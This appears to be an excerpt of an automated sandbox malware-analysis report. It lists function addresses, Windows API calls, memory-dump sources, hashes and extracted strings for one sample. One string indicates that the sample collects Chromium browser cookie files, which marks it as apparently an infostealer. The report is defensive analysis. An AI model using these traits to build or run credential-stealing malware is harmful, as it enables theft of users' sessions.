                  • Source File: 00000000.00000002.2397444397.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                  • Associated: 00000000.00000002.2397382238.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2397474258.0000000000642000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2397655410.000000000064E000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2397680478.0000000000653000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_620000_6RVmzn1DzL.jbxd
                  Similarity
                  • API ID: Window$LocalShow$AllocCommandCurrentDirectoryForegroundFreeIconicLineMessageSendlstrcpylstrlen
                  • String ID:
                  • API String ID: 169060764-0
                  • Opcode ID: 512650012e0a8a73713a72c1c4cc2d1ee88e44aa22d5162ed02d436464829d00
                  • Instruction ID: 72875fefb5efd5c4be2e5b9360c236ce089081049dea819ed5e5342b39b499b1
                  • Opcode Fuzzy Hash: 512650012e0a8a73713a72c1c4cc2d1ee88e44aa22d5162ed02d436464829d00
                  • Instruction Fuzzy Hash: 1C01D275100316BFD3216B64AC5CFAF7BAEEF86B02F901015F60691160DBB45605CAB6
                  Function 00621DB1 Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 31stringCOMMON
                  Download Yara Rule
                  APIs
                  • GetPrivateProfileStringW.KERNEL32(General,OutputDir,0064AF6C,?,00000104,C:\Users\user\Desktop\6RVmzn1DzL.ini), ref: 00621DCE
                  • SHGetFolderPathW.SHELL32(00000000,00008005,00000000,00000000,?), ref: 00621DE1
                  • lstrlenW.KERNEL32(?), ref: 00621DE8
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2397444397.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                  • Associated: 00000000.00000002.2397382238.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2397474258.0000000000642000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2397655410.000000000064E000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2397680478.0000000000653000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_620000_6RVmzn1DzL.jbxd
                  Similarity
                  • API ID: FolderPathPrivateProfileStringlstrlen
                  • String ID: C:\Users\user\Desktop\6RVmzn1DzL.ini$General$OutputDir
                  • API String ID: 2291318327-2386769019
                  • Opcode ID: c0d2592e45cec8c4ffe8f30e2aad8dab10862ca1a938ee5e923a5c79d8a180ac
                  • Instruction ID: 88ebbde73e3f21aaa7af6461f67aeb8f57dac094b1b8126d409d00b8441d1a5a
                  • Opcode Fuzzy Hash: c0d2592e45cec8c4ffe8f30e2aad8dab10862ca1a938ee5e923a5c79d8a180ac
                  • Instruction Fuzzy Hash: 81F0EC30244720BEE3606B60BC0FEA72ABFDF03B017429018F681DB1A0E7904404CBA1
                  Function 00622775 Relevance: 9.0, APIs: 6, Instructions: 42stringwindowCOMMON
                  Download Yara Rule
                  APIs
                  • lstrlenW.KERNEL32(?,?,?,?,?,006229B5), ref: 00622787
                  • CommandLineToArgvW.SHELL32(00000001,?,?,?,?,?,006229B5), ref: 00622796
                    • Part of subcall function 00621364: PathIsRelativeW.SHLWAPI(00000000,?,00000000), ref: 00621427
                    • Part of subcall function 00621364: PathCombineW.SHLWAPI(?,?,00000000), ref: 00621438
                  • GlobalFree.KERNEL32(00000000), ref: 006227AB
                  • IsIconic.USER32(?), ref: 006227B9
                  • ShowWindow.USER32(-00000005,?,006229B5), ref: 006227D0
                  • SetForegroundWindow.USER32 ref: 006227DC
                  Memory Dump Source
                  • Source File: 00000000.00000002.2397444397.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                  • Associated: 00000000.00000002.2397382238.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2397474258.0000000000642000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2397655410.000000000064E000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2397680478.0000000000653000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_620000_6RVmzn1DzL.jbxd
                  Similarity
                  • API ID: PathWindow$ArgvCombineCommandForegroundFreeGlobalIconicLineRelativeShowlstrlen
                  • String ID:
                  • API String ID: 3033830010-0
                  • Opcode ID: 0cc04cdd94d8eece3e025078eba42f50c6b5e09467b30ccc375827a7c9c48c1a
                  • Instruction ID: f4f0c9aec552c5c62f6b0ee73e329c97f842a4fd05e9cb98d1e42c70720fba89
                  • Opcode Fuzzy Hash: 0cc04cdd94d8eece3e025078eba42f50c6b5e09467b30ccc375827a7c9c48c1a
                  • Instruction Fuzzy Hash: 15F0C83A510517ABC7159B64FC58CABBBBBEF577217A41219F812C3170DB315E82CA60
                  Function 031F39C8 Relevance: 9.0, Strings: 7, Instructions: 204COMMON
                  Download Yara Rule
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2399638918.00000000031D1000.00000020.10000000.00040000.00000000.sdmp, Offset: 031D1000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_31d1000_6RVmzn1DzL.jbxd
                  Similarity
                  • API ID:
                  • String ID: .(.#$119,$5 $60&+$?2)$$f$f8 <
                  • API String ID: 0-168083567
                  • Opcode ID: b79027d2259a5c2527928dec550e178c264597034819a51425dc5b5228cbb11a
                  • Instruction ID: 86f7ae0ec1b39aeffe7756ea10c48714d7b28c029cb688d229ebfe5cc083d8fa
                  • Opcode Fuzzy Hash: b79027d2259a5c2527928dec550e178c264597034819a51425dc5b5228cbb11a
                  • Instruction Fuzzy Hash: 1F816DB550C3829FC314CF28C4A0A6BFBE2AFD9304F198E5DE5A987292D734D945CB52
                  Function 02DB533B Relevance: 9.0, Strings: 7, Instructions: 204COMMON
                  Download Yara Rule
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2399357546.0000000002D90000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D90000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_2d90000_6RVmzn1DzL.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID: .(.#$119,$5 $60&+$?2)$$f$f8 <
                  • API String ID: 0-168083567
                  • Opcode ID: 7b9c0addef0757f4e4f74ae11d1d361fac07fb7dd0371e9f7fb81efb46ac8083
                  • Instruction ID: 996aa02229cf43db0c72c56ecb42e0d813c6dce7b45e698c45ad9a721171d93b
                  • Opcode Fuzzy Hash: 7b9c0addef0757f4e4f74ae11d1d361fac07fb7dd0371e9f7fb81efb46ac8083
                  • Instruction Fuzzy Hash: 678168B150C3829FC715CF28D4A0AABBBE2AFD5304F148A5DE0DA87392D774D945CB52
                  Function 031E811E Relevance: 8.8, Strings: 7, Instructions: 80COMMON
                  Download Yara Rule
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2399638918.00000000031D1000.00000020.10000000.00040000.00000000.sdmp, Offset: 031D1000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_31d1000_6RVmzn1DzL.jbxd
                  Similarity
                  • API ID:
                  • String ID: +bf]$ONKD$WaSS$[info] collected cookies file of the chromium-based browser[info] collected cookies file of the chromium-based browser$h_]F$omlT$wvKz
                  • API String ID: 0-2751125561
                  • Opcode ID: 2a3b295869076ce447e71a9fd3a012390a02ab1044f18ad58d3709694ef4cfb5
                  • Instruction ID: 384713589161582a7b2c982b7f95b6a19120fa271c3f6c398ceaceba1717ad26
                  • Opcode Fuzzy Hash: 2a3b295869076ce447e71a9fd3a012390a02ab1044f18ad58d3709694ef4cfb5
                  • Instruction Fuzzy Hash: D83152B054D7818BD318CF25C09062AFFE2ABD67A4F28594CE0D11B395CB75C886CB8A
                  Function 00638694 Relevance: 7.8, APIs: 5, Instructions: 288timeCOMMON
                  Download Yara Rule
                  APIs
                  • __lock.LIBCMT ref: 006386B9
                    • Part of subcall function 0063AAAF: __mtinitlocknum.LIBCMT ref: 0063AAC1
                    • Part of subcall function 0063AAAF: EnterCriticalSection.KERNEL32(?,?,0063395B,0000000D), ref: 0063AADA
                  • ____lc_codepage_func.LIBCMT ref: 00638702
                  • GetTimeZoneInformation.KERNEL32(00651180,00000000,00000000,00000000,00000000,00000000,0064C940,00000034,0063844D,0064C920,00000008,00631454,00000000,?,0000003C,00000000), ref: 00638809
                  • WideCharToMultiByte.KERNEL32(?,00000000,00651184,000000FF,?,0000003F,00000000,?), ref: 00638884
                  • WideCharToMultiByte.KERNEL32(?,00000000,006511D8,000000FF,FFFFFFFE,0000003F,00000000,?), ref: 006388B4
                  Memory Dump Source
                  • Source File: 00000000.00000002.2397444397.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                  • Associated: 00000000.00000002.2397382238.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2397474258.0000000000642000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2397655410.000000000064E000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2397680478.0000000000653000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_620000_6RVmzn1DzL.jbxd
                  Similarity
                  • API ID: ByteCharMultiWide$CriticalEnterInformationSectionTimeZone____lc_codepage_func__lock__mtinitlocknum
                  • String ID:
                  • API String ID: 4287578726-0
                  • Opcode ID: 15dba5b86eb2d76e1f903ca01904981fcd48618dfded57e6e76a4bb8e9aa5e91
                  • Instruction ID: 4352446516cb1826959826d86882fe24a9bc1f95267ac3e5916ba370b920a1bb
                  • Opcode Fuzzy Hash: 15dba5b86eb2d76e1f903ca01904981fcd48618dfded57e6e76a4bb8e9aa5e91
                  • Instruction Fuzzy Hash: 62A1DA719003099EDF259F68D851BEDBBB7AF0A710F68115EF140AB391DB308D41CBA8
                  Function 02DA9A91 Relevance: 7.6, Strings: 6, Instructions: 80COMMON
                  Download Yara Rule
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2399357546.0000000002D90000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D90000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_2d90000_6RVmzn1DzL.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID: +bf]$ONKD$WaSS$h_]F$omlT$wvKz
                  • API String ID: 0-3413313926
                  • Opcode ID: 732d4c0679ead65cfe25c244734bb1766ebb245f61f879a42d21f2afd9798af8
                  • Instruction ID: 9d8fe9ba653ff7dbcebb05ef038b6b1cce994a6de4b03028074263764436cd05
                  • Opcode Fuzzy Hash: 732d4c0679ead65cfe25c244734bb1766ebb245f61f879a42d21f2afd9798af8
                  • Instruction Fuzzy Hash: 863126B054D3818BD3148F2580A072BFFE2ABC6664F28595CE1D51B795CB75C886CB8B
                  Function 00626645 Relevance: 7.3, APIs: 1, Strings: 3, Instructions: 292COMMON
                  Download Yara Rule
                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2397444397.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                  • Associated: 00000000.00000002.2397382238.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2397474258.0000000000642000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2397655410.000000000064E000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2397680478.0000000000653000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_620000_6RVmzn1DzL.jbxd
                  Similarity
                  • API ID: _memset
                  • String ID: *UDF DVD CGMS Info$*UDF FreeEASpace$s+b
                  • API String ID: 2102423945-39572044
                  • Opcode ID: 61ca0514a0aa5cc333172b471246ea2b3fea4003492c13f52cd5a6f75078da17
                  • Instruction ID: 84fdec932ea510d642c4525faf7ce9fa6dfd2e08989d85860cc7ac5b4a700c06
                  • Opcode Fuzzy Hash: 61ca0514a0aa5cc333172b471246ea2b3fea4003492c13f52cd5a6f75078da17
                  • Instruction Fuzzy Hash: 1AB1BDB15047528BDB44CF28D880796BBE2BF49310F1846BEFC89DF346E77099858BA5
                  Function 006342BA Relevance: 6.1, APIs: 4, Instructions: 53timethreadCOMMON
                  Download Yara Rule
                  APIs
                  • GetSystemTimeAsFileTime.KERNEL32(?), ref: 006342EE
                  • GetCurrentThreadId.KERNEL32 ref: 006342FD
                  • GetCurrentProcessId.KERNEL32 ref: 00634306
                  • QueryPerformanceCounter.KERNEL32(?), ref: 00634313
                  Memory Dump Source
                  • Source File: 00000000.00000002.2397444397.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                  • Associated: 00000000.00000002.2397382238.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2397474258.0000000000642000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2397655410.000000000064E000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2397680478.0000000000653000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_620000_6RVmzn1DzL.jbxd
                  Similarity
                  • API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
                  • String ID:
                  • API String ID: 2933794660-0
                  • Opcode ID: 90177ccc61c9764cbc4ce152f37bf6d20e6a8e0f3763d5609f8dc1bc531e2b87
                  • Instruction ID: 47c8cb27ee66202b719dbc08bc86b4271ef21da3ec9afb6bbf8a4856710c529d
                  • Opcode Fuzzy Hash: 90177ccc61c9764cbc4ce152f37bf6d20e6a8e0f3763d5609f8dc1bc531e2b87
                  • Instruction Fuzzy Hash: 1E119E79D052099BDB14CBB8D9544EEB7F6FF49300BA6156BE902E7310EE30AA40CB94
                  Function 006220BD Relevance: 6.0, APIs: 4, Instructions: 48filewindowCOMMON
                  Download Yara Rule
                  APIs
                  • IsIconic.USER32(?), ref: 006220D7
                  • ShowWindow.USER32(?,00000009), ref: 006220E4
                  • DragQueryFileW.SHELL32(?,00000000,?,0000012C), ref: 006220F9
                  • DragFinish.SHELL32(?), ref: 0062212F
                  Memory Dump Source
                  • Source File: 00000000.00000002.2397444397.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                  • Associated: 00000000.00000002.2397382238.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2397474258.0000000000642000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2397655410.000000000064E000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2397680478.0000000000653000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_620000_6RVmzn1DzL.jbxd
                  Similarity
                  • API ID: Drag$FileFinishIconicQueryShowWindow
                  • String ID:
                  • API String ID: 1426964317-0
                  • Opcode ID: 68ef92798b896b8688411f7470c8e0e789f880e02a6716fe6be37f688844a936
                  • Instruction ID: 5343fd13043dc1f32943fc595c21765734b11c4359b85bfad3a6b8fe4d6aa60a
                  • Opcode Fuzzy Hash: 68ef92798b896b8688411f7470c8e0e789f880e02a6716fe6be37f688844a936
                  • Instruction Fuzzy Hash: 5C01F735600A286FD724AB60BC19FFD737AEF96712F6000A9F605971C0EF715B018A9D
                  Function 006231AA Relevance: 4.1, APIs: 1, Strings: 1, Instructions: 581COMMON
                  Download Yara Rule
                  APIs
                  • GetModuleHandleW.KERNEL32(s+b,-00000001B9B1873E,?,-000000016E27A8A4,4180F73C,00000000,?,s+b,C:\Users\user\Desktop\6RVmzn1DzL.ini,00622B73,?,AllowMultipleInstances,00000001), ref: 00623A0B
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2397444397.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                  • Associated: 00000000.00000002.2397382238.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2397474258.0000000000642000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2397655410.000000000064E000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2397680478.0000000000653000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_620000_6RVmzn1DzL.jbxd
                  Similarity
                  • API ID: HandleModule
                  • String ID: s+b
                  • API String ID: 4139908857-2084237830
                  • Opcode ID: 6d580f3fa8ed1a3b4afb3090706ec5d6128b00ca25b0f9d8cbffbff15b2d2121
                  • Instruction ID: 86d07c3ae11a4fd49e6e5e4e953ce3363d86c17f49664831cdce105f0bb60002
                  • Opcode Fuzzy Hash: 6d580f3fa8ed1a3b4afb3090706ec5d6128b00ca25b0f9d8cbffbff15b2d2121
                  • Instruction Fuzzy Hash: EE1235768007268FD398EFB5FDA611A37A3FB92312F45B22DE44297166CF3445428EC9
                  Function 00623570 Relevance: 4.1, APIs: 1, Strings: 1, Instructions: 553COMMON
                  Download Yara Rule
                  APIs
                  • GetModuleHandleW.KERNEL32(s+b,-00000001B9B1873E,?,-000000016E27A8A4,4180F73C,00000000,?,s+b,C:\Users\user\Desktop\6RVmzn1DzL.ini,00622B73,?,AllowMultipleInstances,00000001), ref: 00623A0B
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2397444397.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                  • Associated: 00000000.00000002.2397382238.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2397474258.0000000000642000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2397655410.000000000064E000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2397680478.0000000000653000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_620000_6RVmzn1DzL.jbxd
                  Similarity
                  • API ID: HandleModule
                  • String ID: s+b
                  • API String ID: 4139908857-2084237830
                  • Opcode ID: 89479fb9b213493859ca734b5a702604789e50256db3a8e3eeaa730149f602be
                  • Instruction ID: 37fa8664135e0f097f577dffda73ed39292b3b4c9a731530566b28a89740e1be
                  • Opcode Fuzzy Hash: 89479fb9b213493859ca734b5a702604789e50256db3a8e3eeaa730149f602be
                  • Instruction Fuzzy Hash: 8C121673D107328FC798EFB5FCB611A36A3FB82316F46661EE84297526CA3455018EC9
                  Function 00623611 Relevance: 4.0, APIs: 1, Strings: 1, Instructions: 516COMMON
                  Download Yara Rule
                  APIs
                  • GetModuleHandleW.KERNEL32(s+b,-00000001B9B1873E,?,-000000016E27A8A4,4180F73C,00000000,?,s+b,C:\Users\user\Desktop\6RVmzn1DzL.ini,00622B73,?,AllowMultipleInstances,00000001), ref: 00623A0B
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2397444397.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                  • Associated: 00000000.00000002.2397382238.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2397474258.0000000000642000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2397655410.000000000064E000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2397680478.0000000000653000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_620000_6RVmzn1DzL.jbxd
                  Similarity
                  • API ID: HandleModule
                  • String ID: s+b
                  • API String ID: 4139908857-2084237830
                  • Opcode ID: 2c227143fe4e0deb8ff43d3b2129de9ffd59d80951cf6e9611684718ff9f2b6f
                  • Instruction ID: a6d3aa81e05ab2e7ff8959751e2f14fbcf261a2aa6a2e6b82fbb2600fc57302c
                  • Opcode Fuzzy Hash: 2c227143fe4e0deb8ff43d3b2129de9ffd59d80951cf6e9611684718ff9f2b6f
                  • Instruction Fuzzy Hash: 18021677D107328FC798EFB5FCB601E3663FB82312F46A61DE84297526CA3454018AD9
                  Function 00623304 Relevance: 4.0, APIs: 1, Strings: 1, Instructions: 506COMMON
                  Download Yara Rule
                  APIs
                  • GetModuleHandleW.KERNEL32(s+b,-00000001B9B1873E,?,-000000016E27A8A4,4180F73C,00000000,?,s+b,C:\Users\user\Desktop\6RVmzn1DzL.ini,00622B73,?,AllowMultipleInstances,00000001), ref: 00623A0B
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2397444397.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                  • Associated: 00000000.00000002.2397382238.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2397474258.0000000000642000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2397655410.000000000064E000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2397680478.0000000000653000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_620000_6RVmzn1DzL.jbxd
                  Similarity
                  • API ID: HandleModule
                  • String ID: s+b
                  • API String ID: 4139908857-2084237830
                  • Opcode ID: 32da666ff48a38557550a8b123c3099ffa8c2938fc6405b9bd07e710ae43d3c8
                  • Instruction ID: 2c3d9fd220a0f16522d7313e834c54557893639e40c48fd90085c9a52dcc1eb8
                  • Opcode Fuzzy Hash: 32da666ff48a38557550a8b123c3099ffa8c2938fc6405b9bd07e710ae43d3c8
                  • Instruction Fuzzy Hash: 88F14776C007264FD398EFB5FDA611E3663FB92312F85B22DE44297126CE3444428ECA
                  Function 0062616B Relevance: 3.9, APIs: 1, Strings: 1, Instructions: 384COMMON
                  Download Yara Rule
                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2397444397.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                  • Associated: 00000000.00000002.2397382238.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2397474258.0000000000642000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2397655410.000000000064E000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2397680478.0000000000653000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_620000_6RVmzn1DzL.jbxd
                  Similarity
                  • API ID: _memset
                  • String ID: s+b
                  • API String ID: 2102423945-2084237830
                  • Opcode ID: 6cf72652a4db1e52c9a11aa20ac93f2ff37f25ca14292aaf77132ce7e387941f
                  • Instruction ID: 8a3e68224ee30179acce63266e2d3052a9ce55e40a593f19d8721105dae44fae
                  • Opcode Fuzzy Hash: 6cf72652a4db1e52c9a11aa20ac93f2ff37f25ca14292aaf77132ce7e387941f
                  • Instruction Fuzzy Hash: 5EF1AC719087518FCB14CF28D48069ABBE2FF88314F158A6EF8899B352D374E845CF91
                  Function 00623869 Relevance: 3.9, APIs: 1, Strings: 1, Instructions: 378COMMON
                  Download Yara Rule
                  APIs
                  • GetModuleHandleW.KERNEL32(s+b,-00000001B9B1873E,?,-000000016E27A8A4,4180F73C,00000000,?,s+b,C:\Users\user\Desktop\6RVmzn1DzL.ini,00622B73,?,AllowMultipleInstances,00000001), ref: 00623A0B
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2397444397.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                  • Associated: 00000000.00000002.2397382238.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2397474258.0000000000642000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2397655410.000000000064E000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2397680478.0000000000653000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_620000_6RVmzn1DzL.jbxd
                  Similarity
                  • API ID: HandleModule
                  • String ID: s+b
                  • API String ID: 4139908857-2084237830
                  • Opcode ID: d880753a1d9b49410a152f12b247d520fa5ff78233c534bd419bb42916aa13be
                  • Instruction ID: e7b1be1ec160a8c5027f075f75e9070251c1fc54e444e8c07217fae42e520eee
                  • Opcode Fuzzy Hash: d880753a1d9b49410a152f12b247d520fa5ff78233c534bd419bb42916aa13be
                  • Instruction Fuzzy Hash: 15D12873D147328FC798EFB9FCB605A3763FB92312F42A62DE84297526CA3415018AD5
                  Function 00623506 Relevance: 3.9, APIs: 1, Strings: 1, Instructions: 367COMMON
                  Download Yara Rule
                  APIs
                  • GetModuleHandleW.KERNEL32(s+b,-00000001B9B1873E,?,-000000016E27A8A4,4180F73C,00000000,?,s+b,C:\Users\user\Desktop\6RVmzn1DzL.ini,00622B73,?,AllowMultipleInstances,00000001), ref: 00623A0B
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2397444397.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                  • Associated: 00000000.00000002.2397382238.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2397474258.0000000000642000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2397655410.000000000064E000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2397680478.0000000000653000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_620000_6RVmzn1DzL.jbxd
                  Similarity
                  • API ID: HandleModule
                  • String ID: s+b
                  • API String ID: 4139908857-2084237830
                  • Opcode ID: 067190be0af95c2ca630e775221159936b52ce0436b35889725ea4355cc6d07c
                  • Instruction ID: 4ff3c380a866db40ad614cc76cded624d50e1b30ac79a550e2bdf156581e6e3d
                  • Opcode Fuzzy Hash: 067190be0af95c2ca630e775221159936b52ce0436b35889725ea4355cc6d07c
                  • Instruction Fuzzy Hash: 9DC11476C017368FC798EFB5FCA612D3663FB52312F81B21EE84297126CE3444028AC9
                  Function 0062388D Relevance: 3.9, APIs: 1, Strings: 1, Instructions: 366COMMON
                  Download Yara Rule
                  APIs
                  • GetModuleHandleW.KERNEL32(s+b,-00000001B9B1873E,?,-000000016E27A8A4,4180F73C,00000000,?,s+b,C:\Users\user\Desktop\6RVmzn1DzL.ini,00622B73,?,AllowMultipleInstances,00000001), ref: 00623A0B
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2397444397.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                  • Associated: 00000000.00000002.2397382238.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2397474258.0000000000642000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2397655410.000000000064E000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2397680478.0000000000653000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_620000_6RVmzn1DzL.jbxd
                  Similarity
                  • API ID: HandleModule
                  • String ID: s+b
                  • API String ID: 4139908857-2084237830
                  • Opcode ID: 5b0bfafd706bb24a9c4eea24f21d9be1122d5b50202f3bdd6e90b56e299f7360
                  • Instruction ID: 5077b6eee84bcff241b3bf69c5460caebb75031ee6021bb84335c533f75b5f3f
                  • Opcode Fuzzy Hash: 5b0bfafd706bb24a9c4eea24f21d9be1122d5b50202f3bdd6e90b56e299f7360
                  • Instruction Fuzzy Hash: 44C11773D107328FC798EFB5FCB605A3663FB92312F42A62DE84697526CA3415018AD9
                  Function 00623547 Relevance: 3.8, APIs: 1, Strings: 1, Instructions: 349COMMON
                  Download Yara Rule
                  APIs
                  • GetModuleHandleW.KERNEL32(s+b,-00000001B9B1873E,?,-000000016E27A8A4,4180F73C,00000000,?,s+b,C:\Users\user\Desktop\6RVmzn1DzL.ini,00622B73,?,AllowMultipleInstances,00000001), ref: 00623A0B
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2397444397.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                  • Associated: 00000000.00000002.2397382238.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2397474258.0000000000642000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2397655410.000000000064E000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2397680478.0000000000653000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
